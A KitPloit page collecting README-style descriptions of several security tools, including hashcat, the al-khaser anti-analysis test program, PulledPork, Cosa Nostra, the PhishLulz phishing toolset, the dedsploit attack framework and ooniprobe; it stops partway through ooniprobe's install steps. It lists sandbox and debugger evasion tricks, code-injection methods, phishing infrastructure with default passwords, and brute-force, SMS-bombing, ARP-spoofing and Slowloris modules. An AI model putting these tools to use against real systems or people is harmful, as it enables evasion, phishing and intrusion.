KitPloit - PenTest Tools!

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 160 highly-optimized hashing algorithms. hashcat currently supports CPU's, GPU's other hardware-accelerators on Linux, Windows and OSX, and has facilities to help enable distributed password cracking.

Installation

Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

Usage/Help

Please refer to the Hashcat Wiki and the output of --help for usage information and general help. A list of frequently asked questions may also be found here . The Hashcat Forums also contain a plethora of information.

GPU Driver requirements:

AMD users on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
AMD users on Linux require "AMDGPU-Pro Driver" (16.40 or later)
Intel CPU users require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
Intel GPU on Windows users require "OpenCL Driver for Intel Iris and Intel HD Graphics"
Intel GPU on Linux users require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
NVidia users require "NVIDIA Driver" (367.x or later)

Features

World's fastest password cracker
World's first and only in-kernel rule engine
Free
Open-Source (MIT License)
Multi-OS (Linux, Windows and OSX)
Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
Multi-Hash (Cracking multiple hashes at the same time)
Multi-Devices (Utilizing multiple devices in same system)
Multi-Device-Types (Utilizing mixed device types in same system)
Supports distributed cracking networks (using overlay)
Supports interactive pause / resume
Supports sessions
Supports restore
Supports reading password candidates from file and stdin
Supports hex-salt and hex-charset
Supports automatic performance tuning
Supports automatic keyspace ordering markov-chains
Built-in benchmarking system
Integrated thermal watchdog
160+ Hash-types implemented with performance in mind
... and much more

Algorithms

MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
DES (PT = $salt, key = $pass)
3DES (PT = $salt, key = $pass)
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha1(CX)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Kerberos 5 TGS-REP etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4
OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
Windows 8+ phone PIN/Password
GRUB 2
CRC32
RACF
Radmin2
Redmine
OpenCart
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
PeopleSoft PS_TOKEN
Skype
WinZip
7-Zip
RAR3-hp
RAR5
AxCrypt
AxCrypt in memory SHA1
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
MS Office <= 2003 SHA1
MS Office 2007
MS Office 2010
MS Office 2013
Lotus Notes/Domino 5
Lotus Notes/Domino 6
Lotus Notes/Domino 8
Bitcoin/Litecoin wallet.dat
Blockchain, My Wallet
1Password, agilekeychain
1Password, cloudkeychain
Lastpass
Password Safe v2
Password Safe v3
Keepass 1 (AES/Twofish) and Keepass 2 (AES)
Plaintext
eCryptfs
Android FDE <= 4.3
Android FDE (Samsung DEK)
TrueCrypt
VeraCrypt

Attack-Modes

Straight ^*
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict

^* accept Rules

Supported OpenCL runtimes

AMD
Apple
Intel
Mesa (Gallium)
NVidia
pocl

Supported OpenCL device types

GPU
CPU
APU
DSP
FPGA
Coprocessor

Download Hashcat

al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system. It performs a bunch of nowadays malwares tricks and the goal is to see if you stay under the radar.

Possible uses

You are making an anti-debug plugin and you want to check its effectiveness.
You want to ensure that your sandbox solution is hidden enough.
Or you want to ensure that your malware analysis environement is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks

IsDebuggerPresent
CheckRemoteDebuggerPresent
Process Environement Block (BeingDebugged)
Process Environement Block (NtGlobalFlag)
ProcessHeap (Flags)
ProcessHeap (ForceFlags)
NtQueryInformationProcess (ProcessDebugPort)
NtQueryInformationProcess (ProcessDebugFlags)
NtQueryInformationProcess (ProcessDebugObject)
NtSetInformationThread (HideThreadFromDebugger)
NtQueryObject (ObjectTypeInformation)
NtQueryObject (ObjectAllTypesInformation)
CloseHanlde (NtClose) Invalide Handle
SetHandleInformation (Protected Handle)
UnhandledExceptionFilter
OutputDebugString (GetLastError())
Hardware Breakpoints (SEH / GetThreadContext)
Software Breakpoints (INT3 / 0xCC)
Memory Breakpoints (PAGE_GUARD)
Interrupt 0x2d
Interrupt 1
Parent Process (Explorer.exe)
SeDebugPrivilege (Csrss.exe)
NtYieldExecution / SwitchToThread

Anti-Dumping

Erase PE header from memory
SizeOfImage

Timing Attacks [Anti-Sandbox]

Sleep -> SleepEx -> NtDelayExecution
Sleep (in a loop a small delay)
Sleep and check if time was accelerated (GetTickCount)
SetTimer (Standard Windows Timers)
timeSetEvent (Multimedia Timers)
WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
CreateWaitableTimer (todo)
CreateTimerQueueTimer (todo)
Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

Mouse movement
Total Physical memory (GlobalMemoryStatusEx)
Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
Mouse (Single click / Double click) (todo)
DialogBox (todo)
Scrolling (todo)
Execution after reboot (todo)
Count of processors (Win32/Tinba - Win32/Dyre)
Sandbox known product IDs (todo)
Color of background pixel (todo)
Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

Registry key value artifacts
- HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
- HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
- HARDWARE\Description\System (SystemBiosVersion) (VBOX)
- HARDWARE\Description\System (SystemBiosVersion) (QEMU)
- HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
- HARDWARE\Description\System (SystemBiosDate) (06/23/99)
- HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
- HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
- HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
Registry Keys artifacts
- "HARDWARE\ACPI\DSDT\VBOX__"
- "HARDWARE\ACPI\FADT\VBOX__"
- "HARDWARE\ACPI\RSDT\VBOX__"
- "SOFTWARE\Oracle\VirtualBox Guest Additions"
- "SYSTEM\ControlSet001\Services\VBoxGuest"
- "SYSTEM\ControlSet001\Services\VBoxMouse"
- "SYSTEM\ControlSet001\Services\VBoxService"
- "SYSTEM\ControlSet001\Services\VBoxSF"
- "SYSTEM\ControlSet001\Services\VBoxVideo"
- SOFTWARE\VMware, Inc.\VMware Tools
- SOFTWARE\Wine
File system artifacts
- "system32\drivers\VBoxMouse.sys"
- "system32\drivers\VBoxGuest.sys"
- "system32\drivers\VBoxSF.sys"
- "system32\drivers\VBoxVideo.sys"
- "system32\vboxdisp.dll"
- "system32\vboxhook.dll"
- "system32\vboxmrxnp.dll"
- "system32\vboxogl.dll"
- "system32\vboxoglarrayspu.dll"
- "system32\vboxoglcrutil.dll"
- "system32\vboxoglerrorspu.dll"
- "system32\vboxoglfeedbackspu.dll"
- "system32\vboxoglpackspu.dll"
- "system32\vboxoglpassthroughspu.dll"
- "system32\vboxservice.exe"
- "system32\vboxtray.exe"
- "system32\VBoxControl.exe"
- "system32\drivers\vmmouse.sys"
- "system32\drivers\vmhgfs.sys"
Directories artifacts
- "%PROGRAMFILES%\oracle\virtualbox guest additions\"
- "%PROGRAMFILES%\VMWare\"

Memory artifacts - Interupt Descriptor Table (IDT) location - Local Descriptor Table (LDT) location - Global Descriptor Table (GDT) location - Task state segment trick with STR

MAC Address
- "\x08\x00\x27" (VBOX)
- "\x00\x05\x69" (VMWARE)
- "\x00\x0C\x29" (VMWARE)
- "\x00\x1C\x14" (VMWARE)
- "\x00\x50\x56" (VMWARE)
Virtual devices
- "\\.\VBoxMiniRdrDN"
- "\\.\VBoxGuest"
- "\\.\pipe\VBoxMiniRdDN"
- "\\.\VBoxTrayIPC"
- "\\.\pipe\VBoxTrayIPC")
- "\\.\HGFS"
- "\\.\vmci"
Hardware Device information
- SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
  - QEMU
  - VMWare
  - VBOX
  - VIRTUAL HD
Adapter name
- VMWare
Windows Class
- VBoxTrayToolWndClass
- VBoxTrayToolWnd
Network shares
- VirtualBox Shared Folders
Processes
- vboxservice.exe (VBOX)
- vboxtray.exe (VBOX)
- vmtoolsd.exe (VMWARE)
- vmwaretray.exe (VMWARE)
- vmwareuser (VMWARE)
- vmsrvc.exe (VirtualPC)
- vmusrvc.exe (VirtualPC)
- prl_cc.exe (Parallels)
- prl_tools.exe (Parallels)
- xenservice.exe (Citrix Xen)
WMI
- SELECT * FROM Win32_Bios (SerialNumber) (VMWARE)
- SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
- SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
- SELECT * FROM Win32_NTEventlogFile (VBOX)
- SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
- SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
DLL Exports and Loaded DLLs
- kernel32.dll!wine_get_unix_file_nameWine (Wine)
- sbiedll.dll (Sandboxie)
- dbghelp.dll (MS debugging support routines)
- api_log.dll (iDefense Labs)
- dir_watch.dll (iDefense Labs)
- pstorec.dll (SunBelt Sandbox)
- vmcheck.dll (Virtual PC)
- wpespy.dll (WPE Pro)

Anti-Analysis

Processes
- OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
- SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
- Wireshark / Dumpcap
- ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
- ImportREC / PETools / LordPE
- JoeBox Sandbox

Code/DLL Injections techniques

CreateRemoteThread
SetWindowsHooksEx
NtCreateThreadEx
RtlCreateUserThread
APC (QueueUserAPC / NtQueueApcThread)
RunPE (GetThreadContext / SetThreadContext)

Contributors

mrexodia : Main developer of x64dbg

References

An Anti-Reverse Engineering Guide By Josh Jackson.
Anti-Unpacker Tricks By Peter Ferrie.
The Art Of Unpacking By Mark Vincent Yason.
Walied Assar's blog http://waleedassar.blogspot.de/
Pafish tool: https://github.com/a0rtega/pafish

Download Al-Khaser

PulledPork for Snort and Suricata rule management (from Google code)

Features and Capabilities

Automated downloading, parsing, state modification and rule modification for all of your snort rulesets.
Checksum verification for all major rule downloads
Automatic generation of updated sid-msg.map file
Capability to include your local.rules in sid-msg.map file
Capability to pull rules tarballs from custom urls
Complete Shared Object support
Complete IP Reputation List support
Capability to download multiple disparate rulesets at once
Maintains accurate changelog
Capability to HUP processes after rules download and process
Aids in tuning of rulesets
Verbose output so that you know EXACTLY what is happening
Minimal Perl Module dependencies
Support for Suricata, and ETOpen/ETPro rulesets
A sweet smokey flavor throughout the pork!

Command Usage Reference

Usage: ./pulledpork.pl [-dEgHklnRTPVvv? -help] -c <config filename> -o <rule output path>
   -O <oinkcode> -s <so_rule output directory> -D <Distro> -S <SnortVer>
   -p <path to your snort binary> -C <path to your snort.conf> -t <sostub output path>
   -h <changelog path> -I (security|connectivity|balanced) -i <path to disablesid.conf>
   -b <path to dropsid.conf> -e <path to enablesid.conf> -M <path to modifysid.conf>
   -r <path to docs folder> -K <directory for separate rules files>

Options:

-help/? Print this help info.

-b Where the dropsid config file lives.

-C Path to your snort.conf

-c Where the pulledpork config file lives.

-d Do not verify signature of rules tarball, i.e. downloading fron non VRT or ET locations.

-D What Distro are you running on, for the so_rules
   Valid Distro Types:
     Debian-6-0, Ubuntu-10-4, Ubuntu-12-04, Centos-5-4
     FC-12, FC-14, RHEL-5-5, RHEL-6-0
     FreeBSD-8-1, FreeBSD-9-0, FreeBSD-10-0, OpenBSD-5-2, OpenBSD-5-3
     OpenSUSE-11-4, OpenSUSE-12-1, Slackware-13-1   

-e Where the enablesid config file lives.

-E Write ONLY the enabled rules to the output files.

-g grabonly (download tarball rule file(s) and do NOT process)

-h path to the sid_changelog if you want to keep one?

-H Send a SIGHUP to the pids listed in the config file

-I Specify a base ruleset( -I security,connectivity,or balanced, see README.RULESET)

-i Where the disablesid config file lives.

-k Keep the rules in separate files (using same file names as found when reading)

-K Where (what directory) do you want me to put the separate rules files?

-l Log Important Info to Syslog (Errors, Successful run etc, all items logged as WARN or higher) 

-L Where do you want me to read your local.rules for inclusion in sid-msg.map

-m where do you want me to put the sid-msg.map file?

-M where the modifysid config file lives.

-n Do everything other than download of new files (disablesid, etc)

-o Where do you want me to put generic rules file?

-p Path to your Snort binary

-P Process rules even if no new rules were downloaded

-R When processing enablesid, return the rules to their ORIGINAL state

-r Where do you want me to put the reference docs (xxxx.txt)

-S What version of snort are you using

-s Where do you want me to put the so_rules?

-T Process text based rules files only, i.e. DO NOT process so_rules

-u Where do you want me to pull the rules tarball from
** E.g., ET, Snort.org. See pulledpork config rule_url option for value ideas

-V Print Version and exit

-v Verbose mode, you know.. for troubleshooting and such nonsense.

-vv EXTRA Verbose mode, you know.. for in-depth troubleshooting and other such nonsense.

-w Skip the SSL verification (if there are issues pulling down rule files)

-W Where you want to work around the issue where some implementations of LWP do not work with pulledpork's proxy configuration.

Basic Usage Examples
A simple example of how to use PulledPork would be to specify all of your configuration directives inside of the PulledPork.conf file. Specifically for minimal function, i.e. NO Shared Object rule processing you must define at a minimum the rule_file , oinkcode , temp_path , tar_path , and rule_path values. Below are some examples of this.

./pulledpork.pl -o /usr/local/etc/snort/rules/ -O 12345667778523452344234234  \
  -u http://www.snort.org/reg-rules/snortrules-snapshot-2973.tar.gz -i disablesid.conf -T -H

The above will fetch the snortrules-snapshot-2973.tar.gz tarball from snort.org using the specified oinkcode of 12345667778523452344234234 and put the rules files from that tarball into the output path of /usr/local/etc/snort/rules/ while the -i option tells pulledpork where the disablesid.conf lives, and the -T option tells pulledpork to not process for any shared object rules and the final -H option tells pulledpork to send a Hangup signal to the snort pid that you defined in the pulledpork.conf .

./pulledpork.pl -c pulledpork.conf -i disablesid.conf -T -H

Similar to the first example but all options specified in the pulledpork.conf file (other than disablesid and -H )...

./pulledpork.pl -c pulledpork.conf -i disablesid.conf -m /usr/local/etc/snort/sid-msg.map -Hn

The above will simply read the disablesid and disable as defined, then send a Hangup signal after generating the sid-msg.map at the specified location without downloading anything. Highly useful when tuning / making changes etc..
Next example, snort inline with rules that we want to drop and disable, then HUP our daemons after creating a sid-msg.map and writing change info to sid_changes.log !

./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -m /usr/local/etc/snort/sid-msg.map \
  -h /var/log/sid_changes.log -H

Next example, same as the previous but specifying that we want to run the default "security" based ruleset and that we want to enable rules specified in enablesid.conf .

./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -e enablesid.conf -m /usr/local/etc/snort/sid-msg.map \
  -h /var/log/sid_changes.log -I security -H

Next example, same as the previous but specifying that we want to -K (Keep) the originationg tarball names. and write them to /usr/local/etc/snort/rules/

./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -e enablesid.conf -m /usr/local/etc/snort/sid-msg.map \
  -h /var/log/sid_changes.log -I security -H -K /usr/local/etc/snort/rules/

For users of Suricata, the same steps are necessary for where your installation files reside, but all that pulledpork needs to process rule files is the -S flag being set to suricata-3.1.3 or whatever version of suricata you are using

./pulledpork.pl -c pulledpork.conf -S suricata-3.1.3

Special Notes Section
Please note that pulledpork runs rule modification (enable, drop, disable, modify) in that order by default..
1: enable
2: drop
3: disable
This means that disable rules will always take precedence.. thusly if you specify the same gid:sid in enable and disable configuration files, then that sid will be disabled.. keep this in mind for ranges also! However, you can specify a different order using the state_order keyword in the master config file.
I'll probably add more info later, the --help or --? will display all runtime options and the pulledpork.conf is pretty well annotated... so if you can't figure it out... try harder! And once you figure it out, please feel free to contribute with additional readme / help foo.. thx!
As a side note, I would like to give a shout-out to my buddy Bruce for aiding in the naming of PulledPork! "hopefully that will shut him up ;-)"
J

Download pulledpork

Cosa Nostra is an open source software clustering toolkit with a focus on malware analysis. It can create phylogenetic trees of binary malware samples that are structurally similar. It was initially released during SyScan360 Shanghai (2016).

Getting started

Required 3rd party tools
In order to use Cosa Nostra you will need the source code, of course, a 2.7 version of Python, as well as one of the following tools in order to perform code analysis:

Pyew Written in Python, it supports analysis of PE, ELF, Bios and Boot files for x86 or x86_64.
IDA Written in C++. It supports analysing a plethora of executable types that you probably never even heard about. Commercial product.
Radare2 Written in pure C. Same as with IDA, with support for extremely rare CPUs and binary formats. Also, it's open source!

Analysing binaries
Once you have installed any of the previously mentioned tools you will need to use the appropriate batch tool to analyse the malware samples, like in the example bellow:

$ cd $COSA_NOSTRA_DIR
$ python r2_batch.py example.exe

$ cd $COSA_NOSTRA_DIR
$ python pyew_batch.py example.exe

$ cd $COSA_NOSTRA_DIR
$ /path/to/idaq -B -A -Sida_batch.py example.exe

Automating the Analysis of a Malware Dataset
The easiest way to analyse a malware dataset is by simply running a command like the following example:

$ find /your/malware/dataset/path -type f -exec python r2_batch.py {} ';'

It can be done in parallel by using the "GNU Parallel" tool, as in the following example:

$ find /your/malware/dataset/path -type f | parallel -j 8 python pyew_batch.py {}

In the example above, it will launch a total of 8 pyew_batch processes in parallel.

Database configuration
After the malware samples are analysed, if the analysis was successful, the call graph data for each sample will be stored in, by default, one SQLite database named "db.sqlite". You can configure the database name, path, database system, etc... by editing the file $COSA_NOSTRA_DIR/, as shown bellow:

$ cat config.cfg 
########################################################################
# Configuration for SQLite3
########################################################################
[database]
dbn=sqlite
# Database name
db=db.sqlite

If you prefer to use, say, a MySQL database system, you can configure it in config.cfg by putting the following configuration sections with the appropriate values for your setup:

########################################################################
# Example configuration for MySQL
########################################################################

[database]
dbn=mysql
# Database hostname or IP address
host=localhost
# Database name
db=db_name
# Database username
user=username
# Database password
pw=password

Clusterization of malware samples
This is the step that will take more time. Once you have analysed all the malware samples from your datasets and the call graph signatures, corresponding prime numbers, etc... are calculated and stored in the database, the next step is to find cluster. The tool for doing so is called "cn_clusterer.py". It will make use of the same database configuration file ($COSA_NOSTRA_DIR/config.cfg) in order to extract the call graph signatures for the analysed samples. Running it as simple as doing the following:

$ cd $COSA_NOSTRA_DIR
$ ./cn_clusterer.py
(...)
Calculating difference matrix for 2357, iteration 5540280 out of 7507600 (4858784 matches, 600144 cache misses)
Calculating difference matrix for 2354, iteration 5543020 out of 7507600 (4861293 matches, 600373 cache misses)
Calculating difference matrix for 471, iteration 5545760 out of 7507600 (4863903 matches, 600373 cache misses)
(...)
Making tree for group with 59 sample(s), iteration 0 out of 256
Making tree for group with 393 sample(s), iteration 1 out of 256
Making tree for group with 1347 sample(s), iteration 2 out of 256
(...)
[Wed Nov  2 13:37:12 2016 2830:140561185462080] Creating unnamed cluster...
[Wed Nov  2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Trojan.Skylock-4'...
[Wed Nov  2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Downloader.133181-1'...
[Wed Nov  2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Trojan.Agent-1213378'...
[Wed Nov  2 13:37:13 2016 2830:140561185462080] Done processing phylogenetic trees!
[Wed Nov  2 13:37:13 2016 2830:140561185462080] Done

When the process finishes, clusters grouping the analysed malware samples will be created in the specified database.

Watching clusters: the web GUI
The last step is to launch the web.py based Web application and logging in:

$ cd $COSA_NOSTRA_DIR
$ python cosa_nostra.py [optional port to listen to]
http://0.0.0.0:YOURPORT/

Then, open a browser and navigate to the address printed out by cosa_nostra.py. A login form will be displayed asking for a username and password. By default, it's "admin/cosanostra". You can change it in the file $COSA_NOSTRA_DIR/config.py:

$ cat config.py
#!/usr/bin/env python

#-----------------------------------------------------------------------
# Configuration for Cosa Nostra
#-----------------------------------------------------------------------
DEBUG=False
CN_USER="admin"
# SHA1 hash of the password "cosanostra", change to the SHA1 hash of
# whatever password you prefer.
CN_PASS="048920dedfe36c112d74dc8108abb4db5185a918"
(...)

Once you're logged in you can select from the left panel one the following options:

Samples: See the samples in the current database.
Clusters: See the list of clusters that Cosa Nostra found for the given datasets.

In the "Clusters" view, one can select different clusters and view a hierarchical graph of the discovered malware family.

Screenshots

A small cluster of Trojan.Backspace-1 (name by ClamAV):

A small cluster of MiniDukes:

A cluster of Kazy/Bifroses:

A small part of a really big cluster of FannyWorms:

Download Cosa Nostra

PhishLulz is a Ruby toolset aimed at automating Phishing activities.

When you start a phishing campaign, a dedicated Amazon EC2 (Debian 7) instance is spawned. The VM comes with various open source tools that have been glued together. The two main components are:

PhishingFrenzy (https://github.com/pentestgeek/phishing-frenzy)
BeEF (https://github.com/beefproject/beef)

PhishLulz comes with its own self-signed CA: this is needed to generate self-signed certs for the PhishingFrenzy admin UI. You will also find a bunch of cool phishing templates (which are not in PF) that you can quickly re-use in your scenarios.

Automatic domain registration is still TODO, however you can play with the almost-working code for the NameCheap registrar.

PhishLulz AWS AMI

The public AMI id is: ami-141bb974 You want to clone that, add your SSH keys, and use your nre clone.

The following are default passwords for various services, change them.

MySQL root user: phishlulz_mysql
PhishingFrenzy admin user: phishlulz_frenzy
BeEF beef user: phishlulz_beef

To change the default admin user password/email for PhishingFrenzy use the Rails console: cd /var/www/phishing-frenzy && RAILS_ENV=production rails console admin = Admin.first admin.password = "newpasswd" admin.email = "newemail" admin.save! exit

PhishLulz Toolset

phish_lulz: main script to start/stop phishing instances
tools/find_resources: multi-threaded subdomain discovery and fingerprinting tool
tools/mailboxbug: multi-threaded webmail data extruder
tools/mail_parser: simple script to extract html/txt from an .eml email file
namecheap_wrapper: WIP for automated domain registration

PhishLulz material released at KiwiCon X

![KiwiCon X talk slides]

![PhishLulz phishing]

![MailBoxBug against Outlook Office365]

Requirements

Amazon AWS account (see main config.yaml)
Non-Winzozz OS (path separators are hardcoded on purpose to don't make it compatible with Winzozz)
ssh, scp, openssl in PATH
Sane Ruby environment (RVM suggested). Install the required gems with: gem install sinatra thin watir-webdriver headless colorize datamapper dm-sqlite-adapter dm-timestamps dm-migrations fog nokogiri mail net-ssh --no-rdoc --no-ri
Gecko/Chrome drivers

To instrument Firefox you need to have the geckodriver binary in your PATH. Download it from https://github.com/mozilla/geckodriver/releasesSame thing applies if you prefer instrumenting Chrome, you need the chromedriver.

Once you have the binary, make sure it's in the PATH: export PATH=$PATH:path_to_driver_dir

Finally, make sure the MailBoxBug data extrusion domain has a valid HTTPS certificate (Mixed content...)

Download PhishLulz

Framework for attacking network protocols and network exploitation.

I. Introduction

I don't look back anymore. I don't regret. I look forward

Aiden Pearce

Yes, Watch Dogs has heavily influenced us when writing this framework. This entire project brought upon a lot of the ideals from the Watch Dogs franchise, and even actual hacking culture, to life. This framework aims to exploit and attack some common every-day vulnerabilities, whether it is a misconfiguration of a SSH server, or even the utilization of apache2 as a web server, which could be subjected to malicious Slowloris DoS attacks.

The framework comprises of several modules, and within each module will be attack vectors.

main
|
+--SSH
|    +--
|       |- bruteforce - bruteforce vulnerable SSH server
|
+--SMTP
|     +--
|        | - bruteforce - bruteforce SMTP address (aka email)
|        |
|        | - smsbomb - utilizes smtp-to-email gateway to spam SMS messages
|
+--HTTP
|      +--
|         | - arpspoof - MITM where user fakes ARP messages on LAN, intercepting packets from host
|         |
|         | - slowloris - Layer-7 DoS attack using slow headers and malformed GET requests to a vulnerable web server
|
+--Recon
|       +--
|          | - pscan - port scan with Nmap
|          |
|          | - hosts - scan for active hosts
|
+------

II. Installation & Usage
In order to install this program, it is best that you are on a Linux-based distro, preferably Kali-Linux . You may also be on macOS, but this rollout is tentative and may be buggy.
First, git clone .

git clone https://github.com/ex0dus-0x/dedsploit

Change directory, and then run the installer script (Must be root or have superuser permissions):

cd /path/to/dedsploit
sudo python installer.py

The installer.py script will install of the necessary dependencies for you. Note that other platforms will be supported in the future (for now, manually install, especially if you don't use apt-get as a package manager).
Once finished, execute with*:

dedsploit

if on macOS follow the directions given at the end.

Example of the ssh bruteforce module in use:

Download dedsploit

OONI, the Open Observatory of Network Interference, is a global observation network which aims is to collect high quality data using open methodologies, using Free and Open Source Software (FL/OSS) to share observations and data about the various types, methods, and amounts of network tampering in the world.

"The Net interprets censorship as damage and routes around it."
John Gilmore; TIME magazine (6 December 1993)

ooniprobe is the first program that users run to probe their network and to collect data for the OONI project. Are you interested in testing your network for signs of surveillance and censorship? Do you want to collect data to share with others, so that you and others may better understand your network? If so, please read this document and we hope ooniprobe will help you to gather network data that will assist you with your endeavors!

Read this before running ooniprobe!
Running ooniprobe is a potentially risky activity. This greatly depends on the jurisdiction in which you are in and which test you are running. It is technically possible for a person observing your internet connection to be aware of the fact that you are running ooniprobe. This means that if running network measurement tests is something considered to be illegal in your country then you could be spotted.
Furthermore, ooniprobe takes no precautions to protect the install target machine from forensics analysis. If the fact that you have installed or used ooni probe is a liability for you, please be aware of this risk.

OONI in 5 minutes
The latest ooniprobe version for Debian and Ubuntu releases can be found in the deb.torproject.org package repository.
On Debian stable (jessie):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org jessie main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian testing:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org testing main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian unstable:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org unstable main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Ubuntu 16.10 (yakkety), 16.04 (xenial) or 14.04 (trusty):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org $RELEASE main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
